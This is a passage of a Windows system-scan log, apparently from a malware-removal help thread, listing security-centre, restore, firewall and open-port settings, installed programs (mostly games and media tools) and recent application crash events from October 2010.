    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\PandaFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SophosAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\SymantecFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TinyFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendAntiVirus]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\TrendFirewall]

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Security Center\Monitoring\ZoneLabsFirewall]

    ========== System Restore Settings ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SystemRestore]
    "DisableSR" = 0

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sr]
    "Start" = 0

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SrService]
    "Start" = 2

    ========== Firewall Settings ==========

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile]

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\GloballyOpenPorts\List]
    "57184:TCP" = 57184:TCP:*:Enabled:pando Media Booster
    "57184:UDP" = 57184:UDP:*:Enabled:pando Media Booster

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile]
    "EnableFirewall" = 1
    "DoNotAllowExceptions" = 0
    "DisableNotifications" = 0

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List]
    "1900:UDP" = 1900:UDP:LocalSubNet:Enabled:mad:xpsp2res.dll,-22007
    "2869:TCP" = 2869:TCP:LocalSubNet:Enabled:mad:xpsp2res.dll,-22008
    "3724:TCP" = 3724:TCP:*:Enabled:Blizzard Downloader: 3724
    "5353:TCP" = 5353:TCP:*:Enabled:Adobe CSI CS4
    "8378:TCP" = 8378:TCP:*:Enabled:League of Legends Launcher
    "8378:UDP" = 8378:UDP:*:Enabled:League of Legends Launcher
    "8379:TCP" = 8379:TCP:*:Enabled:League of Legends Launcher
    "8379:UDP" = 8379:UDP:*:Enabled:League of Legends Launcher
    "8380:TCP" = 8380:TCP:*:Enabled:League of Legends Launcher
    "8380:UDP" = 8380:UDP:*:Enabled:League of Legends Launcher
    "8381:TCP" = 8381:TCP:*:Enabled:League of Legends Launcher
    "8381:UDP" = 8381:UDP:*:Enabled:League of Legends Launcher
    "57184:TCP" = 57184:TCP:*:Enabled:pando Media Booster
    "57184:UDP" = 57184:UDP:*:Enabled:pando Media Booster

    ========== Authorized Applications List ==========

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\DomainProfile\AuthorizedApplications\List]
    "C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe" = C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe:*:Enabled:Windows Live Sync -- (Microsoft Corporation)
    "C:\Program Files\Pando Networks\Media Booster\PMB.exe" = C:\Program Files\Pando Networks\Media Booster\PMB.exe:*:Enabled:pando Media Booster -- ()

    [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List]
    "C:\Program Files\Steam\Steam.exe" = C:\Program Files\Steam\Steam.exe:*:Enabled:Steam -- (Valve Corporation)
    "C:\Program Files\Steam\steamapps\common\stalker shadow of chernobyl\bin\XR_3DA.exe" = C:\Program Files\Steam\steamapps\common\stalker shadow of chernobyl\bin\XR_3DA.exe:*:Enabled:S.T.A.L.K.E.R.: Shadow of Chernobyl -- File not found
    "C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe" = C:\Program Files\Malwarebytes' Anti-Malware\mbam.exe:*:Disabled:Malwarebytes' Anti-Malware -- (Malwarebytes Corporation)
    "F:\Program Files\Bethesda Softworks\Fallout 3\Fallout3.exe" = F:\Program Files\Bethesda Softworks\Fallout 3\Fallout3.exe:*:Disabled:Fallout3 -- File not found
    "C:\Program Files\Bethesda Softworks\Fallout 3\Fallout3.exe" = C:\Program Files\Bethesda Softworks\Fallout 3\Fallout3.exe:*:Disabled:Fallout3 -- File not found
    "C:\Program Files\Steam\steamapps\earl_yoist\team fortress 2\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\team fortress 2\hl2.exe:*:Enabled:hl2 -- ()
    "F:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe" = F:\Program Files\EA GAMES\The Sims 2\TSBin\Sims2.exe:*:Disabled:The Sims 2 -- File not found
    "F:\Program Files\BitLord\BitLord.exe" = F:\Program Files\BitLord\BitLord.exe:*:Enabled:BitLord -- File not found
    "C:\Program Files\StarCraft II\StarCraft II.exe" = C:\Program Files\StarCraft II\StarCraft II.exe:*:Enabled:Blizzard Launcher -- (Blizzard Entertainment)
    "C:\Program Files\StarCraft II\Support\BlizzardDownloader.exe" = C:\Program Files\StarCraft II\Support\BlizzardDownloader.exe:*:Enabled:Blizzard Downloader -- (Blizzard Entertainment)
    "C:\Program Files\StarCraft II\Versions\Base15405\SC2.exe" = C:\Program Files\StarCraft II\Versions\Base15405\SC2.exe:*:Enabled:StarCraft II -- (Blizzard Entertainment, Inc.)
    "C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe" = C:\Program Files\Common Files\Adobe\CS4ServiceManager\CS4ServiceManager.exe:*:Enabled:Adobe CSI CS4 -- (Adobe Systems Incorporated)
    "C:\Program Files\Ventrilo\Ventrilo.exe" = C:\Program Files\Ventrilo\Ventrilo.exe:*:Enabled:Ventrilo.exe -- (Flagship Industries, Inc.)
    "F:\Riot Games\League of Legends\air\LolClient.exe" = F:\Riot Games\League of Legends\air\LolClient.exe:*:Enabled:League of Legends Lobby -- File not found
    "F:\Riot Games\League of Legends\game\League of Legends.exe" = F:\Riot Games\League of Legends\game\League of Legends.exe:*:Enabled:League of Legends Game Client -- File not found
    "C:\Program Files\Steam\steamapps\common\alien swarm\srcds.exe" = C:\Program Files\Steam\steamapps\common\alien swarm\srcds.exe:*:Enabled:Alien Swarm Dedicated Server -- ()
    "C:\Program Files\Steam\steamapps\earl_yoist\day of defeat source\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\day of defeat source\hl2.exe:*:Enabled:Day of Defeat: Source -- File not found
    "C:\Program Files\Steam\steamapps\common\alien swarm\swarm.exe" = C:\Program Files\Steam\steamapps\common\alien swarm\swarm.exe:*:Enabled:Alien Swarm -- ()
    "C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe" = C:\Program Files\Windows Live\Sync\WindowsLiveSync.exe:*:Enabled:Windows Live Sync -- (Microsoft Corporation)
    "C:\Riot Games\League of Legends\air\LolClient.exe" = C:\Riot Games\League of Legends\air\LolClient.exe:*:Enabled:League of Legends Lobby -- (Adobe Systems Inc.)
    "C:\Riot Games\League of Legends\game\League of Legends.exe" = C:\Riot Games\League of Legends\game\League of Legends.exe:*:Enabled:League of Legends Game Client -- ()
    "C:\Program Files\Steam\steamapps\earl_yoist\garrysmod\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\garrysmod\hl2.exe:*:Enabled:Garry's Mod -- File not found
    "C:\Program Files\Steam\steamapps\earl_yoist\counter-strike source\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\counter-strike source\hl2.exe:*:Enabled:Counter-Strike: Source -- ()
    "C:\Program Files\Electronic Arts\Crytek\Crysis\Bin32\Crysis.exe" = C:\Program Files\Electronic Arts\Crytek\Crysis\Bin32\Crysis.exe:*:Enabled:Crysis_32 -- (Crytek GmbH)
    "C:\Program Files\Electronic Arts\Crytek\Crysis\Bin32\CrysisDedicatedServer.exe" = C:\Program Files\Electronic Arts\Crytek\Crysis\Bin32\CrysisDedicatedServer.exe:*:Enabled:CrysisDedicatedServer_32 -- (Crytek GmbH)
    "F:\Program Files\Riot Games\League of Legends\air\LolClient.exe" = F:\Program Files\Riot Games\League of Legends\air\LolClient.exe:*:Enabled:League of Legends Lobby -- File not found
    "F:\Program Files\Riot Games\League of Legends\game\League of Legends.exe" = F:\Program Files\Riot Games\League of Legends\game\League of Legends.exe:*:Enabled:League of Legends Game Client -- File not found
    "C:\Program Files\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe" = C:\Program Files\Ubisoft\Ubisoft Game Launcher\UbisoftGameLauncher.exe:*:Enabled:Ubisoft Game Launcher -- File not found
    "C:\Program Files\Steam\steamapps\earl_yoist\source sdk base 2007\hl2.exe" = C:\Program Files\Steam\steamapps\earl_yoist\source sdk base 2007\hl2.exe:*:Enabled:hl2 -- File not found
    "C:\Program Files\StarCraft II\Versions\Base16939\SC2.exe" = C:\Program Files\StarCraft II\Versions\Base16939\SC2.exe:*:Enabled:StarCraft II -- (Blizzard Entertainment, Inc.)
    "C:\Program Files\iTunes\iTunes.exe" = C:\Program Files\iTunes\iTunes.exe:*:Enabled:iTunes -- (Apple Inc.)
    "C:\Program Files\Pando Networks\Media Booster\PMB.exe" = C:\Program Files\Pando Networks\Media Booster\PMB.exe:*:Enabled:pando Media Booster -- ()
    "C:\Program Files\Steam\steamapps\common\left 4 dead 2\left4dead2.exe" = C:\Program Files\Steam\steamapps\common\left 4 dead 2\left4dead2.exe:*:Enabled:Left 4 Dead 2 -- ()
    "C:\Program Files\Steam\steamapps\common\left 4 dead\left4dead.exe" = C:\Program Files\Steam\steamapps\common\left 4 dead\left4dead.exe:*:Enabled:Left 4 Dead -- ()


    ========== HKEY_LOCAL_MACHINE Uninstall List ==========

    [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
    "{000E79B7-E725-4F01-870A-C12942B7F8E4}" = Crysis(R)
    "{00ADFB20-AE75-46F4-AD2C-F48B15AC3100}" = Adobe Color NA Recommended Settings CS4
    "{048298C9-A4D3-490B-9FF9-AB023A9238F3}" = Steam
    "{05308C4E-7285-4066-BAE3-6B50DA6ED755}" = Adobe Update Manager CS4
    "{098727E1-775A-4450-B573-3F441F1CA243}" = kuler
    "{0A0CADCF-78DA-33C4-A350-CD51849B9702}" = Microsoft .NET Framework 4 Extended
    "{0D6013AB-A0C7-41DC-973C-E93129C9A29F}" = Adobe Color JA Extra Settings CS4
    "{0D67A4E4-5BE0-4C9A-8AD8-AB552B433F23}" = Adobe Setup
    "{0F723FC1-7606-4867-866C-CE80AD292DAF}" = Adobe CSI CS4
    "{1618734A-3957-4ADD-8199-F973763109A8}" = Adobe Anchor Service CS4
    "{16E6D2C1-7C90-4309-8EC4-D2212690AAA4}" = AdobeColorCommonSetRGB
    "{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148
    "{205C6BDD-7B73-42DE-8505-9A093F35A238}" = Windows Live Upload Tool
    "{22B775E7-6C42-4FC5-8E10-9A5E3257BD94}" = MSVCRT
    "{26A24AE4-039D-4CA4-87B4-2F83216020FF}" = Java(TM) 6 Update 21
    "{2A981294-F14C-4F0F-9627-D793270922F8}" = Bonjour
    "{2BD5C305-1B27-4D41-B690-7A61172D2FEB}" = Macromedia Flash 8
    "{308B6AEA-DE50-4666-996D-0FA461719D6B}" = Apple Mobile Device Support
    "{3175E049-F9A9-4A3D-8F19-AC9FB04514D1}" = Windows Live Communications Platform
    "{350C97B0-3D7C-4EE8-BAA9-00BCB3D54227}" = WebFldrs XP
    "{35D94F92-1D3A-43C5-8605-EA268B1A7BD9}" = PDF Settings CS4
    "{35ED3F83-4BDC-4c44-8EC6-6A8301C7413A}" = McAfee SiteAdvisor
    "{3A4E8896-C2E7-4084-A4A4-B8FD1894E739}" = Adobe XMP Panels CS4
    "{3C3901C5-3455-3E0A-A214-0B093A5070A6}" = Microsoft .NET Framework 4 Client Profile
    "{3D2C9DE6-9ADE-4252-A241-E43723B0CE02}" = Adobe Color - Photoshop Specific CS4
    "{3D4D4CBF-79F3-4E38-A1DC-30646F030443}" = Microsoft LifeChat
    "{3DA8DF9A-044E-46C4-8531-DEDBB0EE37FF}" = Adobe WinSoft Linguistics Plugin
    "{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}" = erLT
    "{3F425F12-3A1B-4511-97B2-E2BB4701B745}" = Crysis Wars(R)
    "{45338B07-A236-4270-9A77-EBB4115517B5}" = Windows Live Sign-in Assistant
    "{474F25F5-BDC9-40E5-B1B6-F6BF23FC106F}" = Windows Live Essentials
    "{4943EFF5-229F-435D-BEA9-BE3CAEA783A7}" = Adobe Service Manager Extension
    "{4A03706F-666A-4037-7777-5F2748764D10}" = Java Auto Updater
    "{5546CDB5-2CE2-498B-B059-5B3BF81FC41F}" = Macromedia Extension Manager
    "{5570C7F0-43D0-4916-8A9E-AEDD52FA86F4}" = Adobe Color EU Extra Settings CS4
    "{57F0ED40-8F11-41AA-B926-4A66D0D1A9CC}" = Microsoft Office Live Add-in 1.3
    "{63C24A08-70F3-4C8E-B9FB-9F21A903801D}" = Adobe Color Video Profiles CS CS4
    "{63E5CDBF-8214-4F03-84F8-CD3CE48639AD}" = Adobe Photoshop CS4 Support
    "{6530EB5E-F2BE-45D3-906B-E4AFFF2D1588}" = Windows Live Device Manager
    "{6811CAA0-BF12-11D4-9EA1-0050BAE317E1}" = PowerDVD
    "{68243FF8-83CA-466B-B2B8-9F99DA5479C4}" = AdobeColorCommonSetCMYK
    "{716E0306-8318-4364-8B8F-0CC4E9376BAC}" = MSXML 4.0 SP2 Parser and SDK
    "{7299052b-02a4-4627-81f2-1818da5d550d}" = Microsoft Visual C++ 2005 Redistributable
    "{7353BAE6-5E49-46C4-A9B5-8A269A313789}" = Crysis WARHEAD(R)
    "{789289CA-F73A-4A16-A331-54D498CE069F}" = Ventrilo Client
    "{820D3F45-F6EE-4AAF-81EF-CE21FF21D230}" = Adobe Type Support CS4
    "{837b34e3-7c30-493c-8f6a-2b0f04e2912c}" = Microsoft Visual C++ 2005 Redistributable
    "{83877DB1-8B77-45BC-AB43-2BAC22E093E0}" = Adobe Bridge CS4
    "{842B4B72-9E8F-4962-B3C1-1C422A5C4434}" = Suite Shared Configuration CS4
    "{888F1505-C2B3-4FDE-835D-36353EBD4754}" = Ubisoft Game Launcher
    "{89F4137D-6C26-4A84-BDB8-2E5A4BB71E00}" = Microsoft Silverlight
    "{8BF2C401-02CE-424D-BC26-6C4F9FB446B6}" = Macromedia Flash 8 Video Encoder
    "{8FB1B528-E260-451E-9B55-E9152F94B80B}" = Microsoft Games for Windows - LIVE Redistributable
    "{90120000-0010-0409-0000-0000000FF1CE}" = Microsoft Software Update for Web Folders (English) 12
    "{90120000-0015-0409-0000-0000000FF1CE}" = Microsoft Office Access MUI (English) 2007
    "{90120000-0015-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0016-0409-0000-0000000FF1CE}" = Microsoft Office Excel MUI (English) 2007
    "{90120000-0016-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0018-0409-0000-0000000FF1CE}" = Microsoft Office PowerPoint MUI (English) 2007
    "{90120000-0018-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0019-0409-0000-0000000FF1CE}" = Microsoft Office Publisher MUI (English) 2007
    "{90120000-0019-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-001A-0409-0000-0000000FF1CE}" = Microsoft Office Outlook MUI (English) 2007
    "{90120000-001A-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-001B-0409-0000-0000000FF1CE}" = Microsoft Office Word MUI (English) 2007
    "{90120000-001B-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-001F-0409-0000-0000000FF1CE}" = Microsoft Office Proof (English) 2007
    "{90120000-001F-0409-0000-0000000FF1CE}_ENTERPRISE_{ABDDE972-355B-4AF1-89A8-DA50B7B5C045}" = Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
    "{90120000-001F-040C-0000-0000000FF1CE}" = Microsoft Office Proof (French) 2007
    "{90120000-001F-040C-0000-0000000FF1CE}_ENTERPRISE_{F580DDD5-8D37-4998-968E-EBB76BB86787}" = Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
    "{90120000-001F-0C0A-0000-0000000FF1CE}" = Microsoft Office Proof (Spanish) 2007
    "{90120000-001F-0C0A-0000-0000000FF1CE}_ENTERPRISE_{187308AB-5FA7-4F14-9AB9-D290383A10D9}" = Microsoft Office Proofing Tools 2007 Service Pack 2 (SP2)
    "{90120000-002C-0409-0000-0000000FF1CE}" = Microsoft Office Proofing (English) 2007
    "{90120000-0030-0000-0000-0000000FF1CE}" = Microsoft Office Enterprise 2007
    "{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{0B36C6D6-F5D8-4EAF-BF94-4376A230AD5B}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{3D019598-7B59-447A-80AE-815B703B84FF}" = Security Update for Microsoft Office system 2007 (972581)
    "{90120000-0030-0000-0000-0000000FF1CE}_ENTERPRISE_{926CC8AE-8414-43DF-8EB4-CF26D9C3C663}" =
    "{90120000-0044-0409-0000-0000000FF1CE}" = Microsoft Office InfoPath MUI (English) 2007
    "{90120000-0044-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-006E-0409-0000-0000000FF1CE}" = Microsoft Office Shared MUI (English) 2007
    "{90120000-006E-0409-0000-0000000FF1CE}_ENTERPRISE_{DE5A002D-8122-4278-A7EE-3121E7EA254E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-00A1-0409-0000-0000000FF1CE}" = Microsoft Office OneNote MUI (English) 2007
    "{90120000-00A1-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-00BA-0409-0000-0000000FF1CE}" = Microsoft Office Groove MUI (English) 2007
    "{90120000-00BA-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0114-0409-0000-0000000FF1CE}" = Microsoft Office Groove Setup Metadata MUI (English) 2007
    "{90120000-0114-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0115-0409-0000-0000000FF1CE}" = Microsoft Office Shared Setup Metadata MUI (English) 2007
    "{90120000-0115-0409-0000-0000000FF1CE}_ENTERPRISE_{DE5A002D-8122-4278-A7EE-3121E7EA254E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{90120000-0117-0409-0000-0000000FF1CE}" = Microsoft Office Access Setup Metadata MUI (English) 2007
    "{90120000-0117-0409-0000-0000000FF1CE}_ENTERPRISE_{2FC4457D-409E-466F-861F-FB0CB796B53E}" = Microsoft Office 2007 Service Pack 2 (SP2)
    "{92606477-9366-4D3B-8AE3-6BE4B29727AB}" = League of Legends
    "{931AB7EA-3656-4BB7-864D-022B09E3DD67}" = Adobe Linguistics CS4
    "{94D398EB-D2FD-4FD1-B8C4-592635E8A191}" = Adobe CMaps CS4
    "{95120000-00B9-0409-0000-0000000FF1CE}" = Microsoft Application Error Reporting
    "{980A182F-E0A2-4A40-94C1-AE0C1235902E}" = Pando Media Booster
    "{9A25302D-30C0-39D9-BD6F-21E6EC160475}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17
    "{9E2BD6FF-CE8D-47B5-AD9C-0A5C2D54EB3C}" = League of Legends
    "{A1F66FC9-11EE-4F2F-98C9-16F8D1E69FB7}" = Segoe UI
    "{A3051CD0-2F64-3813-A88D-B8DCCDE8F8C7}" = Microsoft .NET Framework 3.0 Service Pack 2
    "{A87B11AC-4344-4E5D-8B12-8F471A87DAD9}" = LightScribe 1.4.136.1
    "{AC76BA86-7AD7-1033-7B44-A94000000001}" = Adobe Reader 9.4.1
    "{B10914FD-8812-47A4-85A1-50FCDE7F1F33}" = Windows Live Sync
    "{B2544A03-10D0-4E5E-BA69-0362FFC20D18}" = OGA Notifier 2.0.0048.0
    "{B28B351F-1232-46EA-85EF-B8EA91641033}" = Nero 7 Essentials
    "{B29AD377-CC12-490A-A480-1452337C618D}" = Connect
    "{B2FE1952-0186-46c3-BAEC-A80AA35AC5B8}_Display.ControlPanel" = NVIDIA Control Panel 260.99
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver" = NVIDIA Graphics Driver 260.99
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NView" = NVIDIA nView 135.36
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX" = NVIDIA PhysX System Software 9.10.0514
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver" = NVIDIA HD Audio Driver 1.1.9.0
    "{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_installer" = NVIDIA Install Application
    "{B57EAFF2-D6EE-4C6C-9175-ED9F17BFC1BC}" = Windows Live Messenger
    "{B65BA85C-0A27-4BC0-A22D-A66F0E5B9494}" = Adobe Photoshop CS4
    "{B9CA59A0-3B70-48F8-9054-67595DE6E72B}" = League of Legends
    "{B9DB4C76-01A4-46D5-8910-F7AA6376DBAF}" = NVIDIA PhysX
    "{BAF78226-3200-4DB4-BE33-4D922A799840}" = Windows Presentation Foundation
    "{BB4E33EC-8181-4685-96F7-8554293DEC6A}" = Adobe Output Module
    "{C09FB3CD-3D0C-3F2D-899A-6A1D67F2073F}" = Microsoft .NET Framework 2.0 Service Pack 2
    "{C301D681-00D3-4597-8446-3DE54FE20F1A}" = TortoiseSVN 1.6.11.20210 (32 bit)
    "{C41300B9-185D-475E-BFEC-39EF732F19B1}" = Apple Software Update
    "{C52E3EC1-048C-45E1-8D53-10B0C6509683}" = Adobe Default Language CS4
    "{CC75AB5C-2110-4A7F-AF52-708680D22FE8}" = Photoshop Camera Raw
    "{CD95D125-2992-4858-B3EF-5F6FB52FBAD6}" = Skype Toolbars
    "{CE2CDD62-0124-36CA-84D3-9F4DCF5C5BD9}" = Microsoft .NET Framework 3.5 SP1
    "{D9D1A2FD-56B2-4F21-B959-745FE43CAB8C}" = Vegas Pro 9.0
    "{E4848436-0345-47E2-B648-8B522FCDA623}" = Adobe Photoshop CS4
    "{E6158D07-2637-4ECF-B576-37C489669174}" = Windows Live Call
    "{E633D396-5188-4E9D-8F6B-BFB8BF3467E8}" = Skype™ 5.0
    "{E7004147-2CCA-431C-AA05-2AB166B9785D}" = QuickTime
    "{EE39FFBD-544E-49E4-A999-6819828EAE91}" = Windows Live Photo Gallery
    "{EE6097DD-05F4-4178-9719-D3170BF098E8}" = Apple Application Support
    "{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}" = Microsoft SQL Server 2005 Compact Edition [ENU]
    "{F0E12BBA-AD66-4022-A453-A1C8A0C4D570}" = Microsoft Choice Guard
    "{F0E64E2E-3A60-40D8-A55D-92F6831875DA}" = Adobe Search for Help
    "{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}" = Realtek High Definition Audio Driver
    "{F4F4F84E-804F-4E9A-84D7-C34283F0088F}" = RealUpgrade 1.0
    "{F8EF2B3F-C345-4F20-8FE4-791A20333CD5}" = Adobe ExtendScript Toolkit CS4
    "{F93C84A6-0DC6-42AF-89FA-776F7C377353}" = Adobe PDF Library Files CS4
    "{F97E3841-CA9D-4964-9D64-26066241D26F}" = Microsoft Games for Windows - LIVE
    "{FAE36873-1941-4076-A9A5-48812B5EA0B7}" = iTunes
    "{FC7E8851-BE97-4367-A253-D34FC7367998}" = X-Mouse Button Control (32bit Version)
    "{FCDD51BB-CAD0-4BB1-B7DF-CE86D1032794}" = Adobe Fonts All
    "{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}" = Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022
    "Adobe Flash Player Plugin" = Adobe Flash Player 10 Plugin
    "Adobe_faf656ef605427ee2f42989c3ad31b8" = Adobe Photoshop CS4
    "Any Video Converter_is1" = Any Video Converter 3.0.7
    "Audacity_is1" = Audacity 1.2.6
    "CCleaner" = CCleaner
    "Crysis Wars(R)" = Crysis Wars(R)
    "ENTERPRISE" = Microsoft Office Enterprise 2007
    "ESET Online Scanner" = ESET Online Scanner v3
    "Game Booster_is1" = Game Booster
    "Halo" = Microsoft Halo
    "KLiteCodecPack_is1" = K-Lite Codec Pack 5.8.3 (Full)
    "Malwarebytes' Anti-Malware_is1" = Malwarebytes' Anti-Malware
    "Microsoft .NET Framework 3.5 SP1" = Microsoft .NET Framework 3.5 SP1
    "Microsoft .NET Framework 4 Client Profile" = Microsoft .NET Framework 4 Client Profile
    "Microsoft .NET Framework 4 Extended" = Microsoft .NET Framework 4 Extended
    "Mozilla Firefox (3.6.12)" = Mozilla Firefox (3.6.12)
    "Mplayer.com" = Mplayer.com
    "NVIDIA Drivers" = NVIDIA Drivers
    "NVIDIA nView Desktop Manager" = NVIDIA nView Desktop Manager
    "PeerGuardian_is1" = PeerGuardian 2.0
    "Pocket Tanks1.3" = Pocket Tanks
    "PunkBusterSvc" = PunkBuster Services
    "RealPlayer 12.0" = RealPlayer
    "RocketDock_is1" = RocketDock 1.3.5
    "sp6" = Logitech SetPoint 6.20
    "StarCraft II" = StarCraft II
    "Steam App 500" = Left 4 Dead
    "Steam App 510" = Left 4 Dead Dedicated Server
    "Steam App 550" = Left 4 Dead 2
    "Steam App 630" = Alien Swarm
    "Windows Media Format Runtime" = Windows Media Format Runtime
    "Windows Media Player" = Windows Media Player 11
    "WinLiveSuite_Wave3" = Windows Live Essentials
    "WinRAR archiver" = WinRAR archiver
    "WMFDist11" = Windows Media Format 11 runtime
    "wmp11" = Windows Media Player 11
    "Xilisoft MKV Converter" = Xilisoft MKV Converter
    "XpsEPSC" = XML Paper Specification Shared Components Pack 1.0
    "YInstHelper" = Yahoo! Install Manager

    ========== HKEY_CURRENT_USER Uninstall List ==========

    [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall]
    "{974C4B12-4D02-4879-85E0-61C95CC63E9E}" = Fallout 3
    "Crysis WARHEAD(R)" = Crysis WARHEAD(R)

    ========== Last 10 Event Log Errors ==========

    [ Application Events ]
    Error - 27/10/2010 5:35:33 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 | ID = 1000
    Description = Faulting application winword.exe, version 12.0.6545.5000, stamp 4c653e57,
    faulting module msvcr80.dll, version 8.0.50727.4053, stamp 4a594c79, debug? 0,
    fault address 0x00015108.

    Error - 27/10/2010 5:35:56 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 | ID = 1000
    Description = Faulting application winword.exe, version 12.0.6545.5000, stamp 4c653e57,
    faulting module msvcr80.dll, version 8.0.50727.4053, stamp 4a594c79, debug? 0,
    fault address 0x00015108.

    Error - 27/10/2010 5:36:17 AM | Computer Name = MARSHALL-D40729 | Source = Microsoft Office 12 | ID = 2001
    Description = Rejected Safe Mode action : Microsoft Office Word.

    Error - 27/10/2010 6:49:40 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application hl2.exe, version 0.0.0.0, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 28/10/2010 7:23:44 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application hl2.exe, version 0.0.0.0, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 29/10/2010 1:27:01 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application Steam.exe, version 1.0.868.88, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 29/10/2010 1:34:14 AM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application Steam.exe, version 1.0.868.88, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 29/10/2010 9:13:53 PM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application RocketDock.exe, version 0.0.0.0, hang module hungapp,
    version 0.0.0.0, hang address 0x00000000.

    Error - 29/10/2010 9:37:09 PM | Computer Name = MARSHALL-D40729 | Source = Application Hang | ID = 1002
    Description = Hanging application Steam.exe, version 1.0.868.88, hang module hungapp,
